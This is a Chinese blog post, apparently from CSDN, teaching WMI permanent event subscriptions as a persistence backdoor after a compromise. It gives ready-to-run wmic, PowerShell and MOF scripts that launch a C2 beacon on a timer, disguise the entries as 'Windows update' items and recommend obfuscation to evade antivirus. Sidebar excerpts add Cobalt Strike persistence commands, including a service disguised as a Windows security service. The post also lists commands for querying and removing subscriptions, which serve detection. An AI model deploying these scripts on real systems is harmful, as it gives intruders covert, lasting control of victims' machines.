WMI利用(权限维持)

最新推荐文章于 2024-08-27 19:03:37 发布
最新推荐文章于 2024-08-27 19:03:37 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: Windows 漏洞经验 内网渗透 文章标签: wmi windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/121229549
版权

讲在前面:

    在简单了解了WMI后,我们开始了横向移动,包括其中的信息收集,工具利用。那么在我们短暂的获取权限后,如何才能将权限持久化,也就是所说的权限维持住呢?笔者看了国内外部分文章后,发现WMI做权限维持主要是介绍WMI事件,并将其分为永久事件和临时事件,本文参考部分博客文章对WMI事件进行讲解,不足之处,望及时指出。

什么是WMI事件

    WMI事件,即特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic来进行操作。通俗的可以说:WMI内部出现什么变化就由WMI事件来进行通知。
    WMI事件中的事件消费者可以分为临时和永久两类,临时的事件消费者只在其运行期间关心特定事件并进行处理,永久消费者作为类的实例注册在WMI命名空间中,一直有效到它被注销。所以在权限维持中一般我们使用WMI永久事件来进行。
对于WMI事件的官方解释以及部分博客解释:

查询事件

#列出事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#列出事件消费者
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#列出事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

列出事件过滤器
在这里插入图片描述
列出事件消费者
在这里插入图片描述

删除事件

#删除事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='事件过滤器名'" | Remove-WmiObject -Verbose

#删除事件消费者
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='事件消费者名'" | Remove-WmiObject -Verbose

#删除事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%事件绑定名%'" | Remove-WmiObject -Verbose

删除事件过滤器
在这里插入图片描述
删除事件消费者
在这里插入图片描述
删除事件绑定
在这里插入图片描述

WMI永久事件

注意:没有指定时间轮询则需要机器重启才可以进行WMI轮询,需要注意的一点是,WMI可以任意指定触发条件,例如用户退出,某个程序创建,结束等等

wmic添加永久事件

#注册一个 WMI 事件过滤器
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BugSecFilter", EventNamespace = "root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'BugSecFilter'"

#注册一个 WMI 事件消费者
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BugSecConsumer", CommandLineTemplate="cmd.exe /c  c:\beacon.exe"

#将事件消费者绑定到事件过滤器
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter='\\.\root\subscription:__EventFilter.Name="BugSecFilter"', Consumer='\\.\root\subscription:CommandLineEventConsumer.Name="BugSecConsumer"'

Powershell添加永久事件

注意:可以考虑添加Powershell的时间间隔器,需要上线至C2则将Payload替换成C2的exe或者dll或者ps1即可。

注意:需要修改一下参数

IntervalBetweenEvents ###修改间隔时间,以毫秒为单位。

$EventFilterArgs 中的 Name ###修改筛选器名称。

Query ###修改其中WQL语句,以下脚本中可不用修改,但TimerID需和$TimerArgs中的参数匹配。

$FinalPayload ###修改Payload,可以指定执行Powershell,或者cmd或者其他命令。

$CommandLineConsumerArgs 中的 Name ###修改消费者名称。

$TimerArgs = @{
 IntervalBetweenEvents = ([UInt32] 2000) # 30 min
 SkipIfPassed = $False
 TimerId ="Trigger" };
 
 
$EventFilterArgs = @{
EventNamespace = 'root/cimv2'
Name = "Windows update trigger"
Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Trigger'"
QueryLanguage = 'WQL' };


$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs;
$FinalPayload = 'cmd.exe /c c:\beacon.exe'
 
$CommandLineConsumerArgs = @{
 Name = "Windows update consumer"
 CommandLineTemplate = $FinalPayload};


$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs;


$FilterToConsumerArgs = @{
 Filter = $Filter
 Consumer = $Consumer};


$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs;

注意:上述脚本出现的WQL语句,也可以指定WITHIN来指定间隔时间,以秒为单位,但是需提前指定TimerID,可以自行修改PS1脚本进行完善,将添加后门、删除后门的操作集成到一个脚本内完成,同时免杀的操作可以针对性的进行混淆或编码的操作。

SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'Trigger'

上线C2

注意:将上述Powershell脚本替换其执行的Payload进行本地执行,另存为ps1格式并修改其轮询的时间。若想做成远程下载格式,则需要将Powershell做好免杀的操作。

运行ps1脚本后成功上线
在这里插入图片描述

Mof文件添加事件

注意:笔者在测试Mof文件添加事件时,编译后的确能够正常添加事件,但是未能执行指定命令。

#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
    Name = "test1comsumer";
    RunInteractively=false;
    CommandLineTemplate="cmd.exe /c c:\beacon.exe";
};

instance of __EventFilter as $Filt
{
    Name = "test1filter";
    EventNamespace = "root\\cimv2";
    Query ="SELECT * FROM __TimerEvent  WITHIN 10 WHERE TimerID = 'test1filter'";
    QueryLanguage = "WQL";
};

instance of __FilterToConsumerBinding
{ 
     Filter = $Filt;
     Consumer = $Cons;
};

编译

mofcomp.exe wmi.mof

在这里插入图片描述
事件添加成功
在这里插入图片描述

本文参考文章:

WMI

检测并移除WMI持久化后门
weixin_41082546的博客
05-05 1273
WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。   WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储在WMI中,达到所谓的无文件;当设定的条件满足时,系统将自动启动powershell进程去执行...
.NET 通过事件订阅实现权限维持
最新发布
ahhacker86的专栏
04-01 41
WMI 全称 Windows Management Instrumentation,是 Windows 操作系统中的一项重要功能,常用于管理和监控系统硬件和软件的启动和运行。而WMI 事件订阅能帮助系统管理员监听系统特定事件并在事件触发时执行预定义操作。WMI 事件订阅涉及几个关键部分,包括 EventFilter、CommandLineEventConsumer 和 FilterToConsumerBinding。这些组合使得事件订阅系统能够监听事件并执行特定的响应操作。
WMI问题答案集锦
Cmoremore的程序大宅门
09-03 3516
WMI使用技巧集 很多的朋友对WMI可能见过但理解不深,我也是十分想了解关于WMI的知识,可一直找不对太合适的资料,在网上的一些资料不是有很多错误,就是讲解不清,我有空的时候将关于WMI的知识集中一下,放在这里便于大家学习。本贴会不断增加。1、 什么是WMIWMI是英文Windows Management Instrumentation的简写,它的功能主要是:访问本地主机的一些信息
权限维持-wmi事件
weixin_30662849的博客
06-02 508
0x01 前言 WMIC扩展WMIWindows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的wmi。 https://www.blackhat.com/docs/us-15/materials/us-15-Gr...
内网权限维持——利用WMI进行权限维持
qq_55202378的博客
08-04 807
WMIWindows Management Instrumentation,Windows管理规范)是windows提供的一种能够直接与系统进行交互的机制,旨在为系统中运行的各程序界定一套独立于环境的标准,允许系统中允许的程序相互交流系统的程序管理信息。WMI事件是Windows管理架构中的一部分,它可以监视应用程序的运行、响应系统和应用程序的事件。通过使用WMI事件,应用程序可以接收系统各类通知,并且在特定事件发生时采取相应的措施。例如,磁盘空间不足时可以通过WMI事件来发出警报等。
WMI利用(横向移动)
Ping_Pig的博客
11-09 2075
WMI利用(横向移动) 讲在前面:     上一篇文章我们简单的解释了什么是WMIWMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。
windows权限维持汇总
LINGX5的博客
08-27 1078
msdtc.exe是微软分布式传输协调程序。该进程调用系统Microsoft Personal Web Server和Microsoft SQLServer。该服务用于管理多个服务器。msdtc.exe是一个并列事务,是分布于两个以上的数据库,消息队列,文件系统或其他事务保护资源管理器,删除要小心。对应服务MSDTC,全称Distributed Transaction Coordinator,Windows系统默认启动该服务对应进程msdtc.exe,位于%windir%system32。
Windows权限维持
A526847的博客
05-24 1153
隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
Windows找出权限维持的后门
A526847的博客
05-29 1297
Windows权限维持主要包含活动隐藏、自启动等技术。
应急响应中的入侵排查和权限维持
weixin_52776876的博客
02-19 3687
入侵排除 一、检查系统账号安全 ()排查服务器弱口令 尝试使用弱口令登录爆破或直接咨询管理员 (二)排查可疑账号、新增账号 1、打开cmd窗口,输入 lusrmgr.msc 2、查看是否存在可疑账号,特别是管理员群组(Administrators)中的新增账号,如果存在需要立即删除或禁用 (三)排查隐藏账号 打开注册表,查看管理员对应键值 1、在桌面打开运行(可使用快捷键 win+R),输入 regedit,打开注册表编辑器 2、选择 HKEY_LOCAL_MACHINE/SAM/SAM,默认无法查看
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1398
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
Windows渗透测试中wmi利用
weixin_30784501的博客
04-06 335
0x01 关于WMI WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMIWindows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。这一点是其它渗透测试工具所不能相比的。 0x02 WMI信息收集 1.检索系统已安装的软件 ...
WMI利用专题
weixin_34177064的博客
03-29 195
WMI 的***,防御与取证分析技术之***篇:http://drops.xmd5.com/static/drops/tips-9973.htmlWMI 的***,防御与取证分析技术之防御篇http://drops.xmd5.com/static/drops/tips-10346.htmlwp-windows-management-instrumentation.pdf:https://www.f...
内网横向——利用WMI进行内网横向
qq_55202378的博客
07-28 1353
WMIWindows Management Instrumentation,Windows管理规范)是一项核心的windows管理技术。从Windows 98开始,windows操作系统都支持WMI。用户可以通过WMI管理本地和远程计算机。Windows为远程传输WMI数据提供了两个可用的协议,即分布式组件对象模型()和windows远程管理(,WinRM),使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等都可以远程执行。
WMI 订阅利用之分析总结
A_991128a的博客
08-12 173
本文对 WMI 的一些利用手法进行了总结,其中主要对 WMI 事件订阅的利用做了详细的剖析,希望可以对大家的学习提供一些帮助。WMIWindows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术。用户可以通过WMI 管理本地和远程计算机。Windows 为远程传输 WMI 数据提供了两个可用的协议,即分布式组件对象模型(Distributed Component。
权限维持
WX公众号-小白学安全
04-15 1292
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术,包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用,欢迎留言分享。在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
无法连接到WMI提供程序。你没有权限或者该服务器无法访问
inr12345的专栏
01-10 7855
无法连接到WMI提供程序。你没有权限或者该服务器无法访问上网搜了搜,在一个老外的博客上找到一个解决方案:(http://blogs.msdn.com/echarran/archive/2006/01/03/509061.aspx) Cannot connect to WMI provider. You do not have permission or the server is
Windows安全基础——Windows WMI详解
Liu_Bruce的博客
12-11 5079
WMIWindows Management Instrumentation, Windows管理规范)是Windows 2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,Distribution Components Object Model)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。对于其他的Win32
解决“无法连接到WMI提供程序,您没有权限或者该服务器无法访问。“
热门推荐
周洲 (Julie)
02-25 3万+
最近在学习PowerDesigner,在创建PDM模型的时候,遇到了一点儿小问题,本以为要重装SQLServer,百度了一下,问题就轻松解决了。问题的背景是这样的,在创建数据源的时候,总是测试连接不成功,我就想打开配置管理器查看一下是不是出了什么问题。结果,就出现了下面的弹窗:↓↓↓ 出错提示:   启动SQL Server 2005 配置管理器时,出现以下提示
CobaltStrik 权限维持
02-09
### Cobalt Strike 权限维持技术细节和方法 #### 使用内置模块实现权限提升 Cobalt Strike 提供了多种用于权限维持的技术,这些技术可以有效地帮助操作员在目标系统上获得更高的访问级别。例如,`getsystem` 命令尝试获取 SYSTEM 权限,这是操作系统中的最高权限之一[^2]。 ```powershell beacon> getsystem ``` 该命令会自动检测并利用各种已知漏洞和技术来提权,如进程注入和服务滥用等。 #### 创建持久化机制 为了确保即使重启也能继续拥有对系统的控制权,可以通过创建计划任务、注册表键或其他形式的启动项来设置持久化连接。具体来说: - **计划任务**:使用 `schtasks` 或 PowerShell cmdlet (`Register-ScheduledTask`) 安排定期运行恶意负载的任务。 ```powershell schtasks /create /tn "SystemUpdate" /tr "<path_to_payload>" /sc DAILY /st 08:00 ``` - **WMI 订阅事件过滤器**:通过 WMI (Windows Management Instrumentation) 设置触发条件,在特定情况下激活 payload 的执行。 ```powershell $filter = Set-WmiInstance -Namespace root\subscription ` -Class __EventFilter -Arguments @{ Name="Startup"; EventNameSpace='root/cimv2'; QueryLanguage='WQL'; Query='SELECT * FROM Win32_ComputerShutdownEvent' } $consumer = Set-Arguments @{ Name="Cleanup"; ExecutablePath="<path_to_cleanup_script>"; CommandLineTemplate="" } Set-WmiInstance -Namespace root\subscription -Class FilterToConsumerBinding -Arguments @{ Filter=$filter; Consumer=$consumer } ``` - **服务安装**:伪装成合法的服务组件,并将其配置为随系统一起启动。 ```powershell New-Service -Name "SecurityHealthService" -DisplayName "Windows Security Health Service" -Description "Provides security health monitoring services." -Service -Name "SecurityHealthService" ``` 以上几种方式均能有效建立长期存在的后门通道,使得攻击者可以在不依赖于当前用户的登录状态的情况下持续监控和操控受感染主机。 #### 利用社会工程学手段 除了技术和编程层面的操作外,还可以借助社工手法诱导受害者授予更高权限给植入物。比如发送带有宏病毒文档附件的钓鱼邮件,当收件人启用宏时即完成 UAC 绕过以及后续动作部署;或是引导用户下载看似无害的应用程序实则暗藏木马逻辑。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值